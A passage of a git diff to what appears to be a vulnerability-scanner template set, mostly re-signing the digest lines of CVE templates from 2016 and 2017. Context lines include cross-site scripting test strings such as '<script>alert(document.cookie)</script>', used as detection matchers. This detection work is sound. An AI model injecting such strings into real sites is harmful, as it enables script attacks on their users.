4a0a00473045022060d3b74c5e345660298a1474ea851ac0cdc6ed4d1be4c5e2cd84a49e2e79e06b0221008e2275a92a46a7525b4adc185cd37e7990f5b597f4217db969e2c4dc9a9f78db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220657adc2a38a598c9c739307271e03f60bac84ec0fdd7b8fe171bf030497bdbf9022100dc7cf4e7c541e2871d54b2f929d4b94f40eccd5bc9e4637374eeb4f9c48c2530:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6277.yaml b/http/cves/2016/CVE-2016-6277.yaml index b192f976ea..6fd8963aa0 100644 --- a/http/cves/2016/CVE-2016-6277.yaml +++ b/http/cves/2016/CVE-2016-6277.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220486802970cc24d96538b869531c7a01ec169cb576278c3edad08fb0b3171abc802206eba1c836af2a9bbfbf9b2fc2efec581afdaeb05159f11aa43a1a80f99cc78df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205b219494263614b882b91badcb1fa30b4b9d68ad57c90001d4439fed26dbaacd0221009b1a8d86efd5251ef6612985e55dc7136fc3f386dcb718907aa4e0b7c6f95e11:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-6601.yaml b/http/cves/2016/CVE-2016-6601.yaml index 95ad415b23..8abab8f195 100644 --- a/http/cves/2016/CVE-2016-6601.yaml +++ b/http/cves/2016/CVE-2016-6601.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220269d98ed6d3161ad0db0a03a7f0809a5f7c818c3ecc57b34ee4d3d4c63eaab40022100e6f5a74ea3414e32776536a764ae0baf50b8f383108184f7d3181f2b5d68cc24:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f4a1e8dd56ed0a8a6a8cc9692b37edef8295462b12b7782b3d8f2fd6e36bdf6e022100b9383b27f28dad89a9fc7bd50b400de9f676c75677f6ff6598c66b338ac76b43:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7834.yaml b/http/cves/2016/CVE-2016-7834.yaml index 9ce4a3870a..9b318c2185 100644 --- a/http/cves/2016/CVE-2016-7834.yaml +++ b/http/cves/2016/CVE-2016-7834.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 204 -# digest: 490a0046304402202f5f026ed0363e14939a797e8be1ba25052d97aeffbf9c4028fab947ee7964bc0220162d36ff26de6a7b2d99f415da04726f6316c88fb6f54a668f3814dff2f37ff4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ea189d4111ce75b717caf6baa54c2cb449e250724b15b5f1a2934cb764686a52022100de80a7c031ac58a9b9240444c1264db7db65571a60326e0de3c82f6541d0bdb3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2016/CVE-2016-7981.yaml b/http/cves/2016/CVE-2016-7981.yaml index a1eee421b9..b23222551e 100644 --- a/http/cves/2016/CVE-2016-7981.yaml +++ b/http/cves/2016/CVE-2016-7981.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220108a509775dbaa87cc9ebc37fab6c4b29677f6ebba3b97c59dfc4a9599163916022100d5b68a149a425c74e250465df013918c58ca05d995f34ef2e1a43ed5aec34bb0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203d479598e86902b6858e73b449d89b3490d625bad56ae942557c461c84fe7f7902201df02b61b476180a451165d2c7410439679f666fdb8deea3dd998b584506213d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-10271.yaml b/http/cves/2017/CVE-2017-10271.yaml index dbefaf615d..9f226413a4 100644 --- a/http/cves/2017/CVE-2017-10271.yaml +++ b/http/cves/2017/CVE-2017-10271.yaml @@ -112,4 +112,4 @@ http: - body == "{{randstr}}" - status_code == 200 condition: and -# digest: 490a0046304402206cd33e205787396c506930ef99f891dab85057ff329031f7f3fafb03a177a46b02201d620b81bc277a73773aff87d2ecf134cde30d6de18c3e92c63af21ce47f0407:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dbc988dec280ae59d70dd9568151c35de08505ec2657bd5fb53b55597d9e7240022100c1ecb47b8e895d85b2418fce0272190b9547b94f1b18fc6549e32bedce5fe4c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11165.yaml b/http/cves/2017/CVE-2017-11165.yaml index 1e333dea18..5540260593 100644 --- a/http/cves/2017/CVE-2017-11165.yaml +++ b/http/cves/2017/CVE-2017-11165.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022008a11ab9e93218a47e8c16b1c9fb7c47dc5316032ba4ef91e67ffa755d13d10c0220410b5f535e0ff53ec6b40a7946b186706170f2fe33bec547ebe0d73e36ce2491:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c631524c65923977cc817706686c9bd084ffad5e51783b2a839b76d4c67091af02202395f868034ad84c6f40b9bb572ebaff7c0f7ca39a3ad3d38a6b5fc9cb057baa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11512.yaml b/http/cves/2017/CVE-2017-11512.yaml index 2588d607a8..d0bc79ad4e 100644 --- a/http/cves/2017/CVE-2017-11512.yaml +++ b/http/cves/2017/CVE-2017-11512.yaml @@ -51,4 +51,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4a0a00473045022100c8643b425b2225117d524d7be9264b46eccff5a7a4daa81dc797d4d99d1d3190022064c2cf6f49d75d08b58057f6ee081777406f5020ed4851f896861f25d9b23f4e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100cb199b44e37551d367047b821f49300f61d49858b1de067bba4dd0f5af55c4dd0221009f84f83d1e43de9ad11f4d6c95d67e88e24e1aa509c79f8188b7fd1806b8de95:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11610.yaml b/http/cves/2017/CVE-2017-11610.yaml index b0c1e57a3e..0749b81be1 100644 --- a/http/cves/2017/CVE-2017-11610.yaml +++ b/http/cves/2017/CVE-2017-11610.yaml @@ -69,4 +69,4 @@ http: - "<methodResponse>" - "<int>" condition: and -# digest: 4b0a00483046022100e8cffc12cec213b44e82f5d0f1309538f5f4bc2ad23587675ff7d09cebd9e62a022100b916e70325f22adc4270f97859f43348cd7b1a973716c95b908ba7ad5960e8b2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035f43b6eaf413ec6cf42ec9e01229c052625ec793f772dff4948fa29acc77c55022100c149c66e8b68bb49a2e0e36ad115b66ae41b4b2745133b3fd9f7d83b51a10874:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-11629.yaml b/http/cves/2017/CVE-2017-11629.yaml index 51bd90b179..43bc1eb5f4 100644 --- a/http/cves/2017/CVE-2017-11629.yaml +++ b/http/cves/2017/CVE-2017-11629.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100d01d92bbe3a4ba9ea85de6f3a033ae4aa2b93a18bd1629682789b01668ec35140221008619ec2e6de780f1c714003d002cb9e11f38bbb4b01264975b377553dface393:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022005fcdc60262e01e12069852afe42a0eedafab81d426886973743338e702ccc62022031d42c10658e22416f781bd233b360a6903478e12077bc6a5485d227dcd87242:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12149.yaml b/http/cves/2017/CVE-2017-12149.yaml index 987a4f9a4d..edfda1c503 100644 --- a/http/cves/2017/CVE-2017-12149.yaml +++ b/http/cves/2017/CVE-2017-12149.yaml @@ -66,4 +66,4 @@ http: status: - 200 - 500 -# digest: 4a0a0047304502204d54cb73bed897ffa2b528315d091376b9a653bfcc5b630be98c4e439fa6bbfc022100898e6d8834740b6c30ccff30123bac61289499278d2d43eebd86790ee9846fe0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210093a029dbe058a25a05e53abbb431152e07db1e0304aa1feb9af3f783577e3e62022100de2b630f57bdf4e444177d9fcd3937b26db57bf1f115f7814a0c67a3e7b7cd85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12583.yaml b/http/cves/2017/CVE-2017-12583.yaml index 7c9366a374..a2b103f3a2 100644 --- a/http/cves/2017/CVE-2017-12583.yaml +++ b/http/cves/2017/CVE-2017-12583.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100828e4fcd424bd9ace343e46f8638dfd3c98669346297095a539c3a73737b30cc02200f2fd1fa4b5766d172ba09008728788b5b375c4373d3f8166751554ccbaad40c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022021e70441ecec6a86cdfa6a9fda31a1331fd0aa632e49876c27d3e2eb3e43d9da02204238eb89e9b3b18bface8760b2fe302ec833b5b159bfb24e58002276da8c728f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12611.yaml b/http/cves/2017/CVE-2017-12611.yaml index 9461b0e9ce..ff5e481f8e 100644 --- a/http/cves/2017/CVE-2017-12611.yaml +++ b/http/cves/2017/CVE-2017-12611.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c9aea2d3b863eb9e683ecc823a4f5e3e8136f7b965fb0c3655538bdf440bcf3d02207491b538b2e590ae2204dc89543ee472e37827f2ef6fe8be39b73d8d715eff34:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202fbef42748f3123d9a6cd014a5b9f612229aa7839437c25339811bd5150c8a5402203f3195e1a44cb5ae1fc4086756c6b0d41465f01ab9b7634fc017c764a77ca9f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12615.yaml b/http/cves/2017/CVE-2017-12615.yaml index 4c02fb4aa7..a75efe6abb 100644 --- a/http/cves/2017/CVE-2017-12615.yaml +++ b/http/cves/2017/CVE-2017-12615.yaml @@ -77,4 +77,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022052d27ec94a5bec175557a6fa3ad9b58f2103d21b5701bffe972374a2a558f4ef0221008fea90ecc31126ba54f54ceb9000e1e65a774c4fb14d9d59205a1e3034977658:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f76ba87ee6950ae8993f54b86cb9d672dad2cad52e4046e468435c556ca24187022100e066b49b38722e0d123561d3d9a2d70dfda587fa91320c78e7bded44327b4eb9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12617.yaml b/http/cves/2017/CVE-2017-12617.yaml index 9d08904c44..a0dd704330 100644 --- a/http/cves/2017/CVE-2017-12617.yaml +++ b/http/cves/2017/CVE-2017-12617.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cc85f49c32a20468afb964c828ef9f1807574d73dfa35714c5dccfd65af2968002210086f149634411289cfa9719c91807a76b9ee9cac520f34c029197b4e250aa1f61:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502200df5d0031dfadf13a1849f2d0c1bb5de3762ceef25bad786d5ddfc3668d41fe8022100d143a6b17d505e9d49d36c4d42d0ef08f67cbf0dcfdf8f977a34b7f7f5d4fe23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12629.yaml b/http/cves/2017/CVE-2017-12629.yaml index 97cf4803fb..6333cd264d 100644 --- a/http/cves/2017/CVE-2017-12629.yaml +++ b/http/cves/2017/CVE-2017-12629.yaml @@ -61,4 +61,4 @@ http: regex: - '"name"\:"(.*?)"' internal: true -# digest: 4a0a0047304502204330e587ad6ed4278528de81d1036e457ce5f98dcbea54a5a68c136afad1a517022100bf95a11942363e362e6d5c911e5424746f92f4b7389d1dfa3dae055421ae4761:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e2c341b990d48ded7ddbd5f4a719db63bcb6e5872f4c375a023f4a8844fc22f502207666e5d47d8024726002d198397d90a82f075facc95ad7a521357eb8f098759f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12635.yaml b/http/cves/2017/CVE-2017-12635.yaml index 7788c9c77b..1b9f35557a 100644 --- a/http/cves/2017/CVE-2017-12635.yaml +++ b/http/cves/2017/CVE-2017-12635.yaml @@ -66,4 +66,4 @@ http: status: - 201 - 409 -# digest: 4b0a00483046022100bc6b8be9a2ae1adc600c103d9514a8a50b5ac05c0df9a3fff1d28ca643eea796022100cb77ea8c8138c7732c50f2462c4e131464f690c8b863c34b390b36042313667b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022050e18ef12c950a98aad45bbff1941e8c7a7fd93167d9f197d425495af6cbc0eb022100cd291eceb0c13ca25c672741579c020568759fb0c2fd96e3cb1ea788aa453432:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-12637.yaml b/http/cves/2017/CVE-2017-12637.yaml index eb64fdd13d..e554926005 100644 --- a/http/cves/2017/CVE-2017-12637.yaml +++ b/http/cves/2017/CVE-2017-12637.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201eb1ef093708f91644f0c82c0d9c6777d4c6c74bac87d6825dbfae9b9c1c3e0c022100a426d0ad10d5f240c23ef2366faa7bac5d05066a4bd437841b5b5117c7133f78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ed783ef94c829051131156882a1d41055caef81f37348b2ee7a988c2c726c40e022100ee5604c068addc2f9d74d2d87a2c8aebdfeded306b9c27dbd7f8e979ddebcf45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14135.yaml b/http/cves/2017/CVE-2017-14135.yaml index e205a729d3..11dd0d4441 100644 --- a/http/cves/2017/CVE-2017-14135.yaml +++ b/http/cves/2017/CVE-2017-14135.yaml @@ -57,4 +57,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a852b1b32792544b5b6f8d6a8e27f16fa2a21752d6257b99b98f4f76d92371c5022100ab03304decd9205f9b33ce74fd73fc0d5bf2996b53a7ad8af64aa0f5d8cca2f4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce29e5525407a2f2e753300fa20de455c7e569e604d0d846e4829e9d89c40ed3022072c1d24e0789446dff4fdd51e0751550c2c54a31f63af7e901ef7affc7f77b65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-14186.yaml b/http/cves/2017/CVE-2017-14186.yaml index 26489ef040..d670acf038 100644 --- a/http/cves/2017/CVE-2017-14186.yaml +++ b/http/cves/2017/CVE-2017-14186.yaml @@ -59,4 +59,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204bc3674dee1eb49c44df21ca6983aefdd561fa760cf2dc5b0511f8a420c15d9d022100be38b58aec0bb2d0baa6e086131178429de65c611eaed9a9e3a705252ed355aa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502201a35ac392c25a48436dfa18c813dbea2d8dca89c123b1d60e5083f49ea75e8e50221009bbe39d97de2e8ca685b62fe32dab6aca9ad9e733ff6fe6ffe5b6306f0d1268b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15287.yaml b/http/cves/2017/CVE-2017-15287.yaml index 67088b4e00..74b4a12fce 100644 --- a/http/cves/2017/CVE-2017-15287.yaml +++ b/http/cves/2017/CVE-2017-15287.yaml @@ -41,4 +41,4 @@ http: - type: word words: - 'Unknown command: <script>alert(document.cookie)</script>' -# digest: 4b0a00483046022100d24d22a1cb3faec3366b57b8dbfa41642ebe1edf9ea030d6be399c7e13235dba022100bad23fce4b4a160d392284f9c0d6801f889143bcc01bac423b6cb519c33403ea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c0006e2859428861ac83e645dd91632ebad9b3a16a76fa2d38689f71ed1b7bea022100f1be24e96e715c1448270af7e94365b6ecda3ffb6dec61ccc86a133b922c0da8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15715.yaml b/http/cves/2017/CVE-2017-15715.yaml index 084264db98..f225164309 100644 --- a/http/cves/2017/CVE-2017-15715.yaml +++ b/http/cves/2017/CVE-2017-15715.yaml @@ -59,4 +59,4 @@ http: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")' -# digest: 4b0a00483046022100e5b95914f4e3f82442439819350bfd0593af2bcbe7c4d94b1f3675ef1b8e5f7e0221008e6d536d529afde82250bb64cee8c324357d63dd2d4b090af6bdac0951e85760:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022072e8c81a95fccbba2c0817ef63de9fd716deffc4300335149cd6b5a986f1d221022100d8ff9ec6b4e97346e457d818b3369eeb7b6cba021aeefffe70baa0910691dafc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-15944.yaml b/http/cves/2017/CVE-2017-15944.yaml index c9f0772cd0..2cd491169f 100644 --- a/http/cves/2017/CVE-2017-15944.yaml +++ b/http/cves/2017/CVE-2017-15944.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207b6986aaa6889e0462da1d7774c50f898c54663ba26b806cbbb8d02f7f8620f2022000dcf8a3535abbb6d12f598df23e35247ff5fcfca180b1025dd7bc918e855643:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ae014c9cd32c5d29942aef4f4c2421bbf24673029ab3c22975a80b7f552e92cd022100be2a31f1a1451ef20600772d89019ec838346b70a0fc0bcc57c3e69f19569331:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16877.yaml b/http/cves/2017/CVE-2017-16877.yaml index 91606616f1..2d841c6509 100644 --- a/http/cves/2017/CVE-2017-16877.yaml +++ b/http/cves/2017/CVE-2017-16877.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9730b947db3bb1357d5caa71c56f2d389c56fa519be8a994ae6d432533f49be022002444ed6379e5c2600c10f50fb2580bd67bf226204375dac092d07dbbca2d1f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210091e1659aa1ea73b0c2a79a5a96a546013d45d612451c5fde63cd376044efbc04022100c0d6d79d63d1ae7522504b96170dfe21f937963d98b3849fc2d4df3b391bd19e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-16894.yaml b/http/cves/2017/CVE-2017-16894.yaml index 91313577bd..c3d23df425 100644 --- a/http/cves/2017/CVE-2017-16894.yaml +++ b/http/cves/2017/CVE-2017-16894.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a541924b65a67b00842f8a25418a80364b6d61f929707787057785e26f98d3b002205403d069324b4a48da8c6cba4b38fc4d1c04a8a1510526608e59a4bcab70e57e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e844fde3edb6cce52d63d6465509d56be598412ecc7a783c99f95e5048fa0b28022000e7f92703c7e0130e41822de0a042d152f2ca780d45bb758994da36ee747c8e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17043.yaml b/http/cves/2017/CVE-2017-17043.yaml index 23ca6dfd9c..36251f3bd6 100644 --- a/http/cves/2017/CVE-2017-17043.yaml +++ b/http/cves/2017/CVE-2017-17043.yaml @@ -61,4 +61,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022031c15c11202c7964366d60e629a94726935eb45208e9d1342418855dd021e4fc022100a7b7f0a3a0ab2dbcad54dc28a88cbfbb1b98b72d7b8dcfd03519b8a935dd99de:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f37d207ab9fe28db5cc54d5091aa2f39e53ef420fccc617f721d87db566ca083022100b13d1e3354b033f80ad09b7f37a5236a4ef7bfefffa8c0293880551a5c2fe2c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17059.yaml b/http/cves/2017/CVE-2017-17059.yaml index bc5d62670a..ffbe822137 100644 --- a/http/cves/2017/CVE-2017-17059.yaml +++ b/http/cves/2017/CVE-2017-17059.yaml @@ -66,4 +66,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f214539df64786c3d52922e14c4c9d2e8766c6bed71928bb04a9c9dc07fb4e53022100e31456e1f51b587f652c6f75dd3239fd76a2a90af5b0c6fa4b9ed64469bbc8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502207165561de2b8f1a952c469829aebbb12531a91fa1278fec5395300eab35aa65602210095f1fa0f9ead77f9384a3fe37c498242d9bd2c4efee9a3b8c302a6b2c0fcd11d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17451.yaml b/http/cves/2017/CVE-2017-17451.yaml index 03697cf997..c1d8804745 100644 --- a/http/cves/2017/CVE-2017-17451.yaml +++ b/http/cves/2017/CVE-2017-17451.yaml @@ -62,4 +62,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a0ddbaf09b68c68b39dfffbe86e40890a1e47752592d33d12f9defe516d7f841022100962efc1e1ab9bd391c8f3f57a1671572a0750fefa25c9c3a2e86d2c923275973:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502204e068d0539ecee04f2481d70422e15a9e52dd17391199978553edbafcc5a2970022100e7b49d9fc769c172e283c3a4e07be4d9930e573a45111367e2166ae7b1ee308d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17731.yaml b/http/cves/2017/CVE-2017-17731.yaml index 5cca4358dc..11918b1c3e 100644 --- a/http/cves/2017/CVE-2017-17731.yaml +++ b/http/cves/2017/CVE-2017-17731.yaml @@ -55,4 +55,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ba551e3088d97f8d462ef4b105c0dc9c4bc6cef870e1e5898d660c13360a9c79022068cf574ec431237b66a83d1398a8b348cbcf96e48a36b441e77089f600452268:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206e5dc37a03a4868f0fef5d07a4800f237ce2f7a038ad853626cf727326cc3ac5022100f332e6f87622332871e8e9644f798d50696bf98563415c9e012f9e6551995a06:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-17736.yaml b/http/cves/2017/CVE-2017-17736.yaml index 4251897c62..bc4ace9258 100644 --- a/http/cves/2017/CVE-2017-17736.yaml +++ b/http/cves/2017/CVE-2017-17736.yaml @@ -55,4 +55,4 @@ http: - "Database Setup" - "SQLServer" condition: and -# digest: 4b0a00483046022100d8ad1f8a03b92de7bc6cebf760d69d12729198d8fcbfa54e5e09cd9e4cfe1aba022100bc14286072cd2f87dad9e6d870daeac4050ae6d77f50a967de331b947f904ecc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221008739f90b1c6a48e8d17547762c5afc7a690a6a78ae2dc27a39f71df9d48903fe02204e81c6b154e63aefd757e8d2fa6f74e3cc3e0db9b37ac194cdeff535bce03a65:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18487.yaml b/http/cves/2017/CVE-2017-18487.yaml index 6d8fd59f23..be4405b8cf 100644 --- a/http/cves/2017/CVE-2017-18487.yaml +++ b/http/cves/2017/CVE-2017-18487.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Google AdSense")' condition: and -# digest: 4b0a00483046022100e2f144543f909a5615a872d0bd6f175f8d7481b76040c77d249082c14cdd77b5022100a45e78dd4bacbe1a90ff470b53c32cb5747094df301236a60c0aa95bbbb15a3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d296b30723a036063df5274c1ec0cb9a6d1f04b7274fe76a1a1dc2fc64a65d77022100d7551c262ffb89bfb53d7f8179f241c1217f3aeacbf9e14f390ca5f54b11e323:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18490.yaml b/http/cves/2017/CVE-2017-18490.yaml index 9a56af64ac..21a5c0aa3c 100644 --- a/http/cves/2017/CVE-2017-18490.yaml +++ b/http/cves/2017/CVE-2017-18490.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form Multi by")' condition: and -# digest: 490a004630440220309d50219f298d7eea07a19c9191ff46c8a45c69b74b58d89a0ad909e927783f022057edf5a64e245323e5dd0e27cbc7b15cc446f824ab7fc1cd11d7ccf9bd8c0a6d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022035b9ebb67781a9f92fbabbed5992a1bd1f5a8d14632e665f682a6bab6f449bac022100e205545161e60b4b7cd3884a30b89e7886e8b645ee348bbe83d75e9daf373012:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18491.yaml b/http/cves/2017/CVE-2017-18491.yaml index aaed7649f7..86ae243d98 100644 --- a/http/cves/2017/CVE-2017-18491.yaml +++ b/http/cves/2017/CVE-2017-18491.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form by")' condition: and -# digest: 4a0a0047304502205922464cb9b082012a5717f6ae4a5c781c09d72276c4a13f00c395e2341c4940022100c3b722a4063eb9e67e300cbbc803ae02cdfd639fc0a887d6ed676e3a54f6ed23:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a531798f7a02de0d10e1674038fc01dde9c312d6a8e5a42525892fc1a69d1ff30220249bfed91327aa2ce38d13f9fa066b36f0791b217b8f7bfd625ce74180ce68c7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18492.yaml b/http/cves/2017/CVE-2017-18492.yaml index 1a6ff295eb..e21107c146 100644 --- a/http/cves/2017/CVE-2017-18492.yaml +++ b/http/cves/2017/CVE-2017-18492.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Contact Form to DB by")' condition: and -# digest: 4a0a00473045022100b6bb8513bced954e51008a530b0724db84f61bb3f0b140ea5002a674017aca9002204ee548db86017b15989be9df5eb8e52e0e4f1a68864352638af2ad67bcc245c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a811b54fa65cdad8be00d6d92397705da1b9063b6a59665a6715a66c0b84a7c602201ec9474bf2f76977a1de15bfd3ca2c9d706ac5864862d9961f7536936cc3c660:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18493.yaml b/http/cves/2017/CVE-2017-18493.yaml index 15e432fae8..ee7fc173a2 100644 --- a/http/cves/2017/CVE-2017-18493.yaml +++ b/http/cves/2017/CVE-2017-18493.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Admin Page by")' condition: and -# digest: 4a0a00473045022100d6fe80f9f7d1aab556e1036f8defebeba6ea11c63f16d34b04afe90e95f4546202200808bf2577b4a08b4780aadbaa4011e1d3f8550e44937ddcb47fe5b3d221cb83:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d25f974df99c734174ac585afbe9e0fc0958f81c020aec928cc4395342edee10022100e343c554441703210dfc2ed4b0b85a002e9e42ff542dd5201b3d67ffd037d6e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18494.yaml b/http/cves/2017/CVE-2017-18494.yaml index 47a1fe675a..4dbc72abdb 100644 --- a/http/cves/2017/CVE-2017-18494.yaml +++ b/http/cves/2017/CVE-2017-18494.yaml @@ -53,4 +53,4 @@ http: - 'contains(body_2, "></script><script>alert(document.domain)</script>\">All</a></li>")' - 'contains(body_3, "Custom Search by")' condition: and -# digest: 4a0a0047304502206317d36f774a6e18918ff1f1e37f50249a0ce640d5a5516998ede088be17bb1a022100f0d31a71b6bc8cf142d888decd4c4a769997873f78303ea4b9a06ea6be1581e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b639822c174a65c5d0cfba84f95f20d33446bf68dd62533bec8d3976557571c2022039af2ae78857a1b7f7bac73c7f570714c71a244fee97092fc751531e7f94e13b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2017/CVE-2017-18496.yaml b/http/cves/2017/CVE-2017-18496.yaml index 35fe3cb310..803363008f 100644 --- 